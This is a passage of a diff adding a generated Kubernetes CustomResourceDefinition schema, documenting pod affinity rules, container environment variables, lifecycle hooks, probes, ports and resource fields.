operator + is Exists or DoesNotExist, the + values array must be empty. + If the operator is Gt or Lt, + the values array must have a + single element, which will be + interpreted as an integer. This + array is replaced during a strategic + merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + type: object + type: array + required: + - nodeSelectorTerms + type: object + type: object + podAffinity: + description: Describes pod affinity scheduling rules + (e.g. co-locate this pod in the same node, zone, + etc. as some other pod(s)). + properties: + preferredDuringSchedulingIgnoredDuringExecution: + description: The scheduler will prefer to schedule + pods to nodes that satisfy the affinity expressions + specified by this field, but it may choose a + node that violates one or more of the expressions. + The node that is most preferred is the one with + the greatest sum of weights, i.e. for each node + that meets all of the scheduling requirements + (resource request, requiredDuringScheduling + affinity expressions, etc.), compute a sum by + iterating through the elements of this field + and adding "weight" to the sum if the node has + pods which matches the corresponding podAffinityTerm; + the node(s) with the highest sum are the most + preferred. + items: + description: The weights of all of the matched + WeightedPodAffinityTerm fields are added per-node + to find the most preferred node(s) + properties: + podAffinityTerm: + description: Required. A pod affinity term, + associated with the corresponding weight. + properties: + labelSelector: + description: A label query over a set + of resources, in this case pods. + properties: + matchExpressions: + description: matchExpressions is + a list of label selector requirements. + The requirements are ANDed. + items: + description: A label selector + requirement is a selector that + contains values, a key, and + an operator that relates the + key and values. + properties: + key: + description: key is the label + key that the selector applies + to. + type: string + operator: + description: operator represents + a key's relationship to + a set of values. Valid operators + are In, NotIn, Exists and + DoesNotExist. + type: string + values: + description: values is an + array of string values. + If the operator is In or + NotIn, the values array + must be non-empty. If the + operator is Exists or DoesNotExist, + the values array must be + empty. This array is replaced + during a strategic merge + patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map + of {key,value} pairs. A single + {key,value} in the matchLabels + map is equivalent to an element + of matchExpressions, whose key + field is "key", the operator is + "In", and the values array contains + only "value". The requirements + are ANDed. + type: object + type: object + namespaceSelector: + description: A label query over the + set of namespaces that the term applies + to. The term is applied to the union + of the namespaces selected by this + field and the ones listed in the namespaces + field. null selector and null or empty + namespaces list means "this pod's + namespace". An empty selector ({}) + matches all namespaces. This field + is beta-level and is only honored + when PodAffinityNamespaceSelector + feature is enabled. + properties: + matchExpressions: + description: matchExpressions is + a list of label selector requirements. + The requirements are ANDed. + items: + description: A label selector + requirement is a selector that + contains values, a key, and + an operator that relates the + key and values. + properties: + key: + description: key is the label + key that the selector applies + to. + type: string + operator: + description: operator represents + a key's relationship to + a set of values. Valid operators + are In, NotIn, Exists and + DoesNotExist. + type: string + values: + description: values is an + array of string values. + If the operator is In or + NotIn, the values array + must be non-empty. If the + operator is Exists or DoesNotExist, + the values array must be + empty. This array is replaced + during a strategic merge + patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map + of {key,value} pairs. A single + {key,value} in the matchLabels + map is equivalent to an element + of matchExpressions, whose key + field is "key", the operator is + "In", and the values array contains + only "value". The requirements + are ANDed. + type: object + type: object + namespaces: + description: namespaces specifies a + static list of namespace names that + the term applies to. The term is applied + to the union of the namespaces listed + in this field and the ones selected + by namespaceSelector. null or empty + namespaces list and null namespaceSelector + means "this pod's namespace" + items: + type: string + type: array + topologyKey: + description: This pod should be co-located + (affinity) or not co-located (anti-affinity) + with the pods matching the labelSelector + in the specified namespaces, where + co-located is defined as running on + a node whose value of the label with + key topologyKey matches that of any + node on which any of the selected + pods is running. Empty topologyKey + is not allowed. + type: string + required: + - topologyKey + type: object + weight: + description: weight associated with matching + the corresponding podAffinityTerm, in + the range 1-100. + format: int32 + type: integer + required: + - podAffinityTerm + - weight + type: object + type: array + requiredDuringSchedulingIgnoredDuringExecution: + description: If the affinity requirements specified + by this field are not met at scheduling time, + the pod will not be scheduled onto the node. + If the affinity requirements specified by this + field cease to be met at some point during pod + execution (e.g. due to a pod label update), + the system may or may not try to eventually + evict the pod from its node. When there are + multiple elements, the lists of nodes corresponding + to each podAffinityTerm are intersected, i.e. + all terms must be satisfied. + items: + description: Defines a set of pods (namely those + matching the labelSelector relative to the + given namespace(s)) that this pod should be + co-located (affinity) or not co-located (anti-affinity) + with, where co-located is defined as running + on a node whose value of the label with key + matches that of any node on + which a pod of the set of pods is running + properties: + labelSelector: + description: A label query over a set of + resources, in this case pods. + properties: + matchExpressions: + description: matchExpressions is a list + of label selector requirements. The + requirements are ANDed. + items: + description: A label selector requirement + is a selector that contains values, + a key, and an operator that relates + the key and values. + properties: + key: + description: key is the label + key that the selector applies + to. + type: string + operator: + description: operator represents + a key's relationship to a set + of values. Valid operators are + In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array + of string values. If the operator + is In or NotIn, the values array + must be non-empty. If the operator + is Exists or DoesNotExist, the + values array must be empty. + This array is replaced during + a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of + {key,value} pairs. A single {key,value} + in the matchLabels map is equivalent + to an element of matchExpressions, + whose key field is "key", the operator + is "In", and the values array contains + only "value". The requirements are + ANDed. + type: object + type: object + namespaceSelector: + description: A label query over the set + of namespaces that the term applies to. + The term is applied to the union of the + namespaces selected by this field and + the ones listed in the namespaces field. + null selector and null or empty namespaces + list means "this pod's namespace". An + empty selector ({}) matches all namespaces. + This field is beta-level and is only honored + when PodAffinityNamespaceSelector feature + is enabled. + properties: + matchExpressions: + description: matchExpressions is a list + of label selector requirements. The + requirements are ANDed. + items: + description: A label selector requirement + is a selector that contains values, + a key, and an operator that relates + the key and values. + properties: + key: + description: key is the label + key that the selector applies + to. + type: string + operator: + description: operator represents + a key's relationship to a set + of values. Valid operators are + In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array + of string values. If the operator + is In or NotIn, the values array + must be non-empty. If the operator + is Exists or DoesNotExist, the + values array must be empty. + This array is replaced during + a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of + {key,value} pairs. A single {key,value} + in the matchLabels map is equivalent + to an element of matchExpressions, + whose key field is "key", the operator + is "In", and the values array contains + only "value". The requirements are + ANDed. + type: object + type: object + namespaces: + description: namespaces specifies a static + list of namespace names that the term + applies to. The term is applied to the + union of the namespaces listed in this + field and the ones selected by namespaceSelector. + null or empty namespaces list and null + namespaceSelector means "this pod's namespace" + items: + type: string + type: array + topologyKey: + description: This pod should be co-located + (affinity) or not co-located (anti-affinity) + with the pods matching the labelSelector + in the specified namespaces, where co-located + is defined as running on a node whose + value of the label with key topologyKey + matches that of any node on which any + of the selected pods is running. Empty + topologyKey is not allowed. + type: string + required: + - topologyKey + type: object + type: array + type: object + podAntiAffinity: + description: Describes pod anti-affinity scheduling + rules (e.g. avoid putting this pod in the same node, + zone, etc. as some other pod(s)). + properties: + preferredDuringSchedulingIgnoredDuringExecution: + description: The scheduler will prefer to schedule + pods to nodes that satisfy the anti-affinity + expressions specified by this field, but it + may choose a node that violates one or more + of the expressions. The node that is most preferred + is the one with the greatest sum of weights, + i.e. for each node that meets all of the scheduling + requirements (resource request, requiredDuringScheduling + anti-affinity expressions, etc.), compute a + sum by iterating through the elements of this + field and adding "weight" to the sum if the + node has pods which matches the corresponding + podAffinityTerm; the node(s) with the highest + sum are the most preferred. + items: + description: The weights of all of the matched + WeightedPodAffinityTerm fields are added per-node + to find the most preferred node(s) + properties: + podAffinityTerm: + description: Required. A pod affinity term, + associated with the corresponding weight. + properties: + labelSelector: + description: A label query over a set + of resources, in this case pods. + properties: + matchExpressions: + description: matchExpressions is + a list of label selector requirements. + The requirements are ANDed. + items: + description: A label selector + requirement is a selector that + contains values, a key, and + an operator that relates the + key and values. + properties: + key: + description: key is the label + key that the selector applies + to. + type: string + operator: + description: operator represents + a key's relationship to + a set of values. Valid operators + are In, NotIn, Exists and + DoesNotExist. + type: string + values: + description: values is an + array of string values. + If the operator is In or + NotIn, the values array + must be non-empty. If the + operator is Exists or DoesNotExist, + the values array must be + empty. This array is replaced + during a strategic merge + patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map + of {key,value} pairs. A single + {key,value} in the matchLabels + map is equivalent to an element + of matchExpressions, whose key + field is "key", the operator is + "In", and the values array contains + only "value". The requirements + are ANDed. + type: object + type: object + namespaceSelector: + description: A label query over the + set of namespaces that the term applies + to. The term is applied to the union + of the namespaces selected by this + field and the ones listed in the namespaces + field. null selector and null or empty + namespaces list means "this pod's + namespace". An empty selector ({}) + matches all namespaces. This field + is beta-level and is only honored + when PodAffinityNamespaceSelector + feature is enabled. + properties: + matchExpressions: + description: matchExpressions is + a list of label selector requirements. + The requirements are ANDed. + items: + description: A label selector + requirement is a selector that + contains values, a key, and + an operator that relates the + key and values. + properties: + key: + description: key is the label + key that the selector applies + to. + type: string + operator: + description: operator represents + a key's relationship to + a set of values. Valid operators + are In, NotIn, Exists and + DoesNotExist. + type: string + values: + description: values is an + array of string values. + If the operator is In or + NotIn, the values array + must be non-empty. If the + operator is Exists or DoesNotExist, + the values array must be + empty. This array is replaced + during a strategic merge + patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map + of {key,value} pairs. A single + {key,value} in the matchLabels + map is equivalent to an element + of matchExpressions, whose key + field is "key", the operator is + "In", and the values array contains + only "value". The requirements + are ANDed. + type: object + type: object + namespaces: + description: namespaces specifies a + static list of namespace names that + the term applies to. The term is applied + to the union of the namespaces listed + in this field and the ones selected + by namespaceSelector. null or empty + namespaces list and null namespaceSelector + means "this pod's namespace" + items: + type: string + type: array + topologyKey: + description: This pod should be co-located + (affinity) or not co-located (anti-affinity) + with the pods matching the labelSelector + in the specified namespaces, where + co-located is defined as running on + a node whose value of the label with + key topologyKey matches that of any + node on which any of the selected + pods is running. Empty topologyKey + is not allowed. + type: string + required: + - topologyKey + type: object + weight: + description: weight associated with matching + the corresponding podAffinityTerm, in + the range 1-100. + format: int32 + type: integer + required: + - podAffinityTerm + - weight + type: object + type: array + requiredDuringSchedulingIgnoredDuringExecution: + description: If the anti-affinity requirements + specified by this field are not met at scheduling + time, the pod will not be scheduled onto the + node. If the anti-affinity requirements specified + by this field cease to be met at some point + during pod execution (e.g. due to a pod label + update), the system may or may not try to eventually + evict the pod from its node. When there are + multiple elements, the lists of nodes corresponding + to each podAffinityTerm are intersected, i.e. + all terms must be satisfied. + items: + description: Defines a set of pods (namely those + matching the labelSelector relative to the + given namespace(s)) that this pod should be + co-located (affinity) or not co-located (anti-affinity) + with, where co-located is defined as running + on a node whose value of the label with key + matches that of any node on + which a pod of the set of pods is running + properties: + labelSelector: + description: A label query over a set of + resources, in this case pods. + properties: + matchExpressions: + description: matchExpressions is a list + of label selector requirements. The + requirements are ANDed. + items: + description: A label selector requirement + is a selector that contains values, + a key, and an operator that relates + the key and values. + properties: + key: + description: key is the label + key that the selector applies + to. + type: string + operator: + description: operator represents + a key's relationship to a set + of values. Valid operators are + In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array + of string values. If the operator + is In or NotIn, the values array + must be non-empty. If the operator + is Exists or DoesNotExist, the + values array must be empty. + This array is replaced during + a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of + {key,value} pairs. A single {key,value} + in the matchLabels map is equivalent + to an element of matchExpressions, + whose key field is "key", the operator + is "In", and the values array contains + only "value". The requirements are + ANDed. + type: object + type: object + namespaceSelector: + description: A label query over the set + of namespaces that the term applies to. + The term is applied to the union of the + namespaces selected by this field and + the ones listed in the namespaces field. + null selector and null or empty namespaces + list means "this pod's namespace". An + empty selector ({}) matches all namespaces. + This field is beta-level and is only honored + when PodAffinityNamespaceSelector feature + is enabled. + properties: + matchExpressions: + description: matchExpressions is a list + of label selector requirements. The + requirements are ANDed. + items: + description: A label selector requirement + is a selector that contains values, + a key, and an operator that relates + the key and values. + properties: + key: + description: key is the label + key that the selector applies + to. + type: string + operator: + description: operator represents + a key's relationship to a set + of values. Valid operators are + In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array + of string values. If the operator + is In or NotIn, the values array + must be non-empty. If the operator + is Exists or DoesNotExist, the + values array must be empty. + This array is replaced during + a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of + {key,value} pairs. A single {key,value} + in the matchLabels map is equivalent + to an element of matchExpressions, + whose key field is "key", the operator + is "In", and the values array contains + only "value". The requirements are + ANDed. + type: object + type: object + namespaces: + description: namespaces specifies a static + list of namespace names that the term + applies to. The term is applied to the + union of the namespaces listed in this + field and the ones selected by namespaceSelector. + null or empty namespaces list and null + namespaceSelector means "this pod's namespace" + items: + type: string + type: array + topologyKey: + description: This pod should be co-located + (affinity) or not co-located (anti-affinity) + with the pods matching the labelSelector + in the specified namespaces, where co-located + is defined as running on a node whose + value of the label with key topologyKey + matches that of any node on which any + of the selected pods is running. Empty + topologyKey is not allowed. + type: string + required: + - topologyKey + type: object + type: array + type: object + type: object + automountServiceAccountToken: + description: AutomountServiceAccountToken indicates whether + a service account token should be automatically mounted. + type: boolean + containers: + description: List of containers belonging to the pod. + Containers cannot currently be added or removed. There + must be at least one container in a Pod. Cannot be updated. + items: + description: A single application container that you + want to run within a pod. + properties: + args: + description: 'Arguments to the entrypoint. The docker + image''s CMD is used if this is not provided. + Variable references $(VAR_NAME) are expanded using + the container''s environment. If a variable cannot + be resolved, the reference in the input string + will be unchanged. Double $$ are reduced to a + single $, which allows for escaping the $(VAR_NAME) + syntax: i.e. "$$(VAR_NAME)" will produce the string + literal "$(VAR_NAME)". Escaped references will + never be expanded, regardless of whether the variable + exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + command: + description: 'Entrypoint array. Not executed within + a shell. The docker image''s ENTRYPOINT is used + if this is not provided. Variable references $(VAR_NAME) + are expanded using the container''s environment. + If a variable cannot be resolved, the reference + in the input string will be unchanged. Double + $$ are reduced to a single $, which allows for + escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" + will produce the string literal "$(VAR_NAME)". + Escaped references will never be expanded, regardless + of whether the variable exists or not. Cannot + be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + env: + description: List of environment variables to set + in the container. Cannot be updated. + items: + description: EnvVar represents an environment + variable present in a Container. + properties: + name: + description: Name of the environment variable. + Must be a C_IDENTIFIER. + type: string + value: + description: 'Variable references $(VAR_NAME) + are expanded using the previously defined + environment variables in the container and + any service environment variables. If a + variable cannot be resolved, the reference + in the input string will be unchanged. Double + $$ are reduced to a single $, which allows + for escaping the $(VAR_NAME) syntax: i.e. + "$$(VAR_NAME)" will produce the string literal + "$(VAR_NAME)". Escaped references will never + be expanded, regardless of whether the variable + exists or not. Defaults to "".' + type: string + valueFrom: + description: Source for the environment variable's + value. Cannot be used if value is not empty. + properties: + configMapKeyRef: + description: Selects a key of a ConfigMap. + properties: + key: + description: The key to select. + type: string + name: + description: 'Name of the referent. + More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap + or its key must be defined + type: boolean + required: + - key + type: object + fieldRef: + description: 'Selects a field of the pod: + supports metadata.name, metadata.namespace, + `metadata.labels['''']`, `metadata.annotations['''']`, + spec.nodeName, spec.serviceAccountName, + status.hostIP, status.podIP, status.podIPs.' + properties: + apiVersion: + description: Version of the schema + the FieldPath is written in terms + of, defaults to "v1". + type: string + fieldPath: + description: Path of the field to + select in the specified API version. + type: string + required: + - fieldPath + type: object + resourceFieldRef: + description: 'Selects a resource of the + container: only resources limits and + requests (limits.cpu, limits.memory, + limits.ephemeral-storage, requests.cpu, + requests.memory and requests.ephemeral-storage) + are currently supported.' + properties: + containerName: + description: 'Container name: required + for volumes, optional for env vars' + type: string + divisor: + anyOf: + - type: integer + - type: string + description: Specifies the output + format of the exposed resources, + defaults to "1" + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + resource: + description: 'Required: resource to + select' + type: string + required: + - resource + type: object + secretKeyRef: + description: Selects a key of a secret + in the pod's namespace + properties: + key: + description: The key of the secret + to select from. Must be a valid + secret key. + type: string + name: + description: 'Name of the referent. + More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the Secret + or its key must be defined + type: boolean + required: + - key + type: object + type: object + required: + - name + type: object + type: array + envFrom: + description: List of sources to populate environment + variables in the container. The keys defined within + a source must be a C_IDENTIFIER. All invalid keys + will be reported as an event when the container + is starting. When a key exists in multiple sources, + the value associated with the last source will + take precedence. Values defined by an Env with + a duplicate key will take precedence. Cannot be + updated. + items: + description: EnvFromSource represents the source + of a set of ConfigMaps + properties: + configMapRef: + description: The ConfigMap to select from + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap + must be defined + type: boolean + type: object + prefix: + description: An optional identifier to prepend + to each key in the ConfigMap. Must be a + C_IDENTIFIER. + type: string + secretRef: + description: The Secret to select from + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the Secret + must be defined + type: boolean + type: object + type: object + type: array + image: + description: 'Docker image name. More info: https://kubernetes.io/docs/concepts/containers/images + This field is optional to allow higher level config + management to default or override container images + in workload controllers like Deployments and StatefulSets.' + type: string + imagePullPolicy: + description: 'Image pull policy. One of Always, + Never, IfNotPresent. Defaults to Always if :latest + tag is specified, or IfNotPresent otherwise. Cannot + be updated. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images' + type: string + lifecycle: + description: Actions that the management system + should take in response to container lifecycle + events. Cannot be updated. + properties: + postStart: + description: 'PostStart is called immediately + after a container is created. If the handler + fails, the container is terminated and restarted + according to its restart policy. Other management + of the container blocks until the hook completes. + More info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the + action to take. + properties: + command: + description: Command is the command + line to execute inside the container, + the working directory for the command is + root ('/') in the container's filesystem. + The command is simply exec'd, it is + not run inside a shell, so traditional + shell instructions ('|', etc) won't + work. To use a shell, you need to + explicitly call out to that shell. + Exit status of 0 is treated as live/healthy + and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http + request to perform. + properties: + host: + description: Host name to connect to, + defaults to the pod IP. You probably + want to set "Host" in httpHeaders + instead. + type: string + httpHeaders: + description: Custom headers to set in + the request. HTTP allows repeated + headers. + items: + description: HTTPHeader describes + a custom header to be used in HTTP + probes + properties: + name: + description: The header field + name + type: string + value: + description: The header field + value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet + supported TODO: implement a realistic + TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to + connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + preStop: + description: 'PreStop is called immediately + before a container is terminated due to an + API request or management event such as liveness/startup + probe failure, preemption, resource contention, + etc. The handler is not called if the container + crashes or exits. The reason for termination + is passed to the handler. The Pod''s termination + grace period countdown begins before the PreStop + hooked is executed. Regardless of the outcome + of the handler, the container will eventually + terminate within the Pod''s termination grace + period. Other management of the container + blocks until the hook completes or until the + termination grace period is reached. More + info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the + action to take. + properties: + command: + description: Command is the command + line to execute inside the container, + the working directory for the command is + root ('/') in the container's filesystem. + The command is simply exec'd, it is + not run inside a shell, so traditional + shell instructions ('|', etc) won't + work. To use a shell, you need to + explicitly call out to that shell. + Exit status of 0 is treated as live/healthy + and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http + request to perform. + properties: + host: + description: Host name to connect to, + defaults to the pod IP. You probably + want to set "Host" in httpHeaders + instead. + type: string + httpHeaders: + description: Custom headers to set in + the request. HTTP allows repeated + headers. + items: + description: HTTPHeader describes + a custom header to be used in HTTP + probes + properties: + name: + description: The header field + name + type: string + value: + description: The header field + value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet + supported TODO: implement a realistic + TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to + connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + type: object + livenessProbe: + description: 'Periodic probe of container liveness. + Container will be restarted if the probe fails. + Cannot be updated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the action + to take. + properties: + command: + description: Command is the command line + to execute inside the container, the working + directory for the command is root ('/') + in the container's filesystem. The command + is simply exec'd, it is not run inside + a shell, so traditional shell instructions + ('|', etc) won't work. To use a shell, + you need to explicitly call out to that + shell. Exit status of 0 is treated as + live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for + the probe to be considered failed after having + succeeded. Defaults to 3. Minimum value is + 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request + to perform. + properties: + host: + description: Host name to connect to, defaults + to the pod IP. You probably want to set + "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the + request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom + header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container + has started before liveness probes are initiated. + More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform + the probe. Default to 10 seconds. Minimum + value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for + the probe to be considered successful after + having failed. Defaults to 1. Must be 1 for + liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet supported + TODO: implement a realistic TCP lifecycle + hook' + properties: + host: + description: 'Optional: Host name to connect + to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the + pod needs to terminate gracefully upon probe + failure. The grace period is the duration + in seconds after the processes running in + the pod are sent a termination signal and + the time when the processes are forcibly halted + with a kill signal. Set this value longer + than the expected cleanup time for your process. + If this value is nil, the pod's terminationGracePeriodSeconds + will be used. Otherwise, this value overrides + the value provided by the pod spec. Value + must be non-negative integer. The value zero + indicates stop immediately via the kill signal + (no opportunity to shut down). This is a beta + field and requires enabling ProbeTerminationGracePeriod + feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds + is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which + the probe times out. Defaults to 1 second. + Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + name: + description: Name of the container specified as + a DNS_LABEL. Each container in a pod must have + a unique name (DNS_LABEL). Cannot be updated. + type: string + ports: + description: List of ports to expose from the container. + Exposing a port here gives the system additional + information about the network connections a container + uses, but is primarily informational. Not specifying + a port here DOES NOT prevent that port from being + exposed. Any port which is listening on the default + "0.0.0.0" address inside a container will be accessible + from the network. Cannot be updated. + items: + description: ContainerPort represents a network + port in a single container. + properties: + containerPort: + description: Number of port to expose on the + pod's IP address. This must be a valid port + number, 0 < x < 65536. + format: int32 + type: integer + hostIP: + description: What host IP to bind the external + port to. + type: string + hostPort: + description: Number of port to expose on the + host. If specified, this must be a valid + port number, 0 < x < 65536. If HostNetwork + is specified, this must match ContainerPort. + Most containers do not need this. + format: int32 + type: integer + name: + description: If specified, this must be an + IANA_SVC_NAME and unique within the pod. + Each named port in a pod must have a unique + name. Name for the port that can be referred + to by services. + type: string + protocol: + default: TCP + description: Protocol for port. Must be UDP, + TCP, or SCTP. Defaults to "TCP". + type: string + required: + - containerPort + type: object + type: array + x-kubernetes-list-map-keys: + - containerPort + - protocol + x-kubernetes-list-type: map + readinessProbe: + description: 'Periodic probe of container service + readiness. Container will be removed from service + endpoints if the probe fails. Cannot be updated. + More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the action + to take. + properties: + command: + description: Command is the command line + to execute inside the container, the working + directory for the command is root ('/') + in the container's filesystem. The command + is simply exec'd, it is not run inside + a shell, so traditional shell instructions + ('|', etc) won't work. To use a shell, + you need to explicitly call out to that + shell. Exit status of 0 is treated as + live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for + the probe to be considered failed after having + succeeded. Defaults to 3. Minimum value is + 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request + to perform. + properties: + host: + description: Host name to connect to, defaults + to the pod IP. You probably want to set + "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the + request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom + header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container + has started before liveness probes are initiated. + More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform + the probe. Default to 10 seconds. Minimum + value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for + the probe to be considered successful after + having failed. Defaults to 1. Must be 1 for + liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet supported + TODO: implement a realistic TCP lifecycle + hook' + properties: + host: + description: 'Optional: Host name to connect + to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the + pod needs to terminate gracefully upon probe + failure. The grace period is the duration + in seconds after the processes running in + the pod are sent a termination signal and + the time when the processes are forcibly halted + with a kill signal. Set this value longer + than the expected cleanup time for your process. + If this value is nil, the pod's terminationGracePeriodSeconds + will be used. Otherwise, this value overrides + the value provided by the pod spec. Value + must be non-negative integer. The value zero + indicates stop immediately via the kill signal + (no opportunity to shut down). This is a beta + field and requires enabling ProbeTerminationGracePeriod + feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds + is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which + the probe times out. Defaults to 1 second. + Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + resources: + description: 'Compute Resources required by this + container. Cannot be updated. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + properties: + limits: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: 